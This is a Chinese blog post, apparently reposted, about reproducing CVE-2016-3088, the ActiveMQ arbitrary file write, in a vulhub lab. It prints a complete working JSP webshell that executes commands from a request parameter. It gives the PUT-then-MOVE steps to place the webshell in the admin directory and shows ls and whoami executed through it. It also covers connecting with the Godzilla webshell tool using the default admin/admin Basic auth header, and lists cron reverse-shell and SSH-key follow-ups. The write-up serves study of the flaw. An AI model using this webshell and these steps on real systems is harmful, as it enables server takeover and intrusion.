【vulhub漏洞复现】CVE-2016-3088 ActiveMQ任意文件写入漏洞

这篇具有很好参考价值的文章主要介绍了【vulhub漏洞复现】CVE-2016-3088 ActiveMQ任意文件写入漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、漏洞详情

影响版本:Apache ActiveMQ 5.x~5.14.0

漏洞原理:ActiveMQ中存储文件的fileserver接口支持写入文件,但是没有执行权限。可以通过MOVE文件至其他可执行目录下,从而实现文件写入并访问。

ActiveMQ在5.12.x~5.13.x版本中,默认关闭了fileserver这个应用(但是可以在conf/jetty.xml中开启);在5.14.0版本以后,彻底删除了fileserver应用。

二、复现过程

  1. 搭建docker环境

docker-compose up -d
【vulhub漏洞复现】CVE-2016-3088 ActiveMQ任意文件写入漏洞,vulhub漏洞复现,web安全,java-activemq,网络安全,安全,Powered by 金山文档

访问8161端口

【vulhub漏洞复现】CVE-2016-3088 ActiveMQ任意文件写入漏洞,vulhub漏洞复现,web安全,java-activemq,网络安全,安全,Powered by 金山文档

默认账户密码admin/admin 登录

【vulhub漏洞复现】CVE-2016-3088 ActiveMQ任意文件写入漏洞,vulhub漏洞复现,web安全,java-activemq,网络安全,安全,Powered by 金山文档
  1. 写入webshell文件

文件上传成功需要有以下几点前提:

  • 知道文件上传的绝对路径

  • 网站有文件上传功能

  • 文件类型没有被限制

  • 上传的文件可以被执行

ActiveMQ的绝对路径可以通过http://your-ip:8161/admin/test/systemProperties.jsp页面获取

【vulhub漏洞复现】CVE-2016-3088 ActiveMQ任意文件写入漏洞,vulhub漏洞复现,web安全,java-activemq,网络安全,安全,Powered by 金山文档

在网上找了个jsp的木马

<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>

用bp抓包上传,可以看见上传成功

【vulhub漏洞复现】CVE-2016-3088 ActiveMQ任意文件写入漏洞,vulhub漏洞复现,web安全,java-activemq,网络安全,安全,Powered by 金山文档

访问http://192.168.239.128:8161/fileserver/1.jsp,文件写入但是没有被执行

【vulhub漏洞复现】CVE-2016-3088 ActiveMQ任意文件写入漏洞,vulhub漏洞复现,web安全,java-activemq,网络安全,安全,Powered by 金山文档
  1. MOVE文件至可执行目录下

利用MOVE,将木马文件移动到api或者admin,我这边是移动到了admin目录下

ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口
【vulhub漏洞复现】CVE-2016-3088 ActiveMQ任意文件写入漏洞,vulhub漏洞复现,web安全,java-activemq,网络安全,安全,Powered by 金山文档
  1. 访问文件

http://192.168.239.128:8161/admin/1.jsp?cmd=ls
【vulhub漏洞复现】CVE-2016-3088 ActiveMQ任意文件写入漏洞,vulhub漏洞复现,web安全,java-activemq,网络安全,安全,Powered by 金山文档
http://192.168.239.128:8161/admin/1.jsp?cmd=whoami
【vulhub漏洞复现】CVE-2016-3088 ActiveMQ任意文件写入漏洞,vulhub漏洞复现,web安全,java-activemq,网络安全,安全,Powered by 金山文档
  1. (另)利用哥斯拉生成木马并连接

使用哥斯拉生成jsp木马文件,将文件PUT至fileserver接口中,返回204,也上传成功了

【vulhub漏洞复现】CVE-2016-3088 ActiveMQ任意文件写入漏洞,vulhub漏洞复现,web安全,java-activemq,网络安全,安全,Powered by 金山文档

MOVE文件

【vulhub漏洞复现】CVE-2016-3088 ActiveMQ任意文件写入漏洞,vulhub漏洞复现,web安全,java-activemq,网络安全,安全,Powered by 金山文档

用哥斯拉进行连接

URL=http://192.168.239.128:8161/admin/1.jsp

注意有效载荷和加密器的选择

因为上述的操作需要admin管理员的登录,所以我们需要在请求配置中加上认证头

Authorization: Basic YWRtaW46YWRtaW4=

【vulhub漏洞复现】CVE-2016-3088 ActiveMQ任意文件写入漏洞,vulhub漏洞复现,web安全,java-activemq,网络安全,安全,Powered by 金山文档
【vulhub漏洞复现】CVE-2016-3088 ActiveMQ任意文件写入漏洞,vulhub漏洞复现,web安全,java-activemq,网络安全,安全,Powered by 金山文档

测试连接,连接成功

【vulhub漏洞复现】CVE-2016-3088 ActiveMQ任意文件写入漏洞,vulhub漏洞复现,web安全,java-activemq,网络安全,安全,Powered by 金山文档
【vulhub漏洞复现】CVE-2016-3088 ActiveMQ任意文件写入漏洞,vulhub漏洞复现,web安全,java-activemq,网络安全,安全,Powered by 金山文档

三、总结

MOVE方法还是具有很大危险性的,慎用!

任意文件写入还有其他的思路:

写入webshell(修改jetty.xml只是为写入webshell排除掉admin和api需要登录的前提条件)
写入cron文件(定时反弹shell)
写入ssh key

在此献上大佬的文章,对手上述三种方法针对改漏洞都做出了详细过程的讲解

https://www.freebuf.com/vuls/274088.html

身为小白的我还需要继续深造阿。。。文章来源地址https://www.toymoban.com/news/detail-520224.html

到了这里,关于【vulhub漏洞复现】CVE-2016-3088 ActiveMQ任意文件写入漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Weblogic 任意文件上传漏洞(CVE-2018-2894)复现

    目录 weblogic  漏洞环境准备 漏洞复现 修复建议 WebLogic 是 美国Oracle公司 出品的一个 application server ,确切的说是一个基于 JAVAEE 架构的 中间件 , WebLogic 是用于 开发 、集成、部署和管理大型分布式 Web 应用、 网络应用 和 数据库应用 的 Java应用服务器 。将 Java 的动态功能和

    2024年02月01日
    浏览(47)
  • CVE-2023-3836:大华智慧园区综合管理平台任意文件上传漏洞复现

    免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!! 大华智慧园区

    2024年02月09日
    浏览(47)
  • 【漏洞复现】Ruby on Rails 路径穿越与任意文件读取漏洞(CVE-2019-5418)

    1. 漏洞简介 Ruby on Rails使用了指定参数的render file来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。我们可以通过修改访问某控制器的请求包,通过…/…/…/…/来达到路径穿越的目的,然后再通过{{来闭合模板查询路径,那我们访问的文件会被当做外部

    2024年02月04日
    浏览(59)
  • [ vulhub漏洞复现篇 ] Drupal XSS漏洞 (CVE-2019-6341)

    👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋 🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋 🙏作者水平有

    2023年04月16日
    浏览(51)
  • 【漏洞复现】Apache_Tomcat_PUT方法任意写文件(CVE-2017-12615)

    感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规 说明 内容 漏洞编号 CVE-2017-12615 漏洞名称 Tomcat_PUT方法任意写文件 漏洞评级 高危 影响范围 Tomcat版本:8.5.19 漏洞描述 漏洞本质Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件 修复方案

    2024年02月05日
    浏览(37)
  • [ vulhub漏洞复现篇 ] Drupal<7.32 Drupalgeddon SQL注入漏洞(CVE-2014-3704)

    👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋 🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋 🙏作者水平有

    2023年04月14日
    浏览(50)
  • ActiveMQ 反序列化漏洞 (CVE-2015-5254)复现

    1、Apache ActiveMQ Apache ActiveMQ是Apache软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。 2、漏洞产生原理 该组件程序造成的漏洞不限制代理中可以序列化的类。远程攻击者可以使一个特殊的序列化 Java 消息服务 (JMS) ObjectMessage 对象利用此漏

    2024年02月10日
    浏览(49)
  • PhpMyAdmin远程执行代码漏洞复现 (CVE-2016-5734)

    0x01 漏洞介绍 phpMyAdmin是phpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 phpMyAdmin 中存在安全漏洞,该漏洞源于程序没有正确选择分隔符来避免使用 preg_replace e 修饰符。 可借助特

    2024年02月11日
    浏览(41)
  • Linux提权—脏牛漏洞(CVE-2016-5195)复现

    脏牛漏洞:         脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。 漏洞范围:        【影响版本】:该漏洞在全版本Linux系统(Linux kernel = 2.6.22)均可

    2024年02月15日
    浏览(47)
  • vulnhub_phpmyadmin_CVE-2016-5734漏洞复现

    漏洞简介 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进preg_replace函数第一个参数中。 在PHP5.4.7以前,preg_replace的第一个参数可以利用\\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,

    2024年02月08日
    浏览(38)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包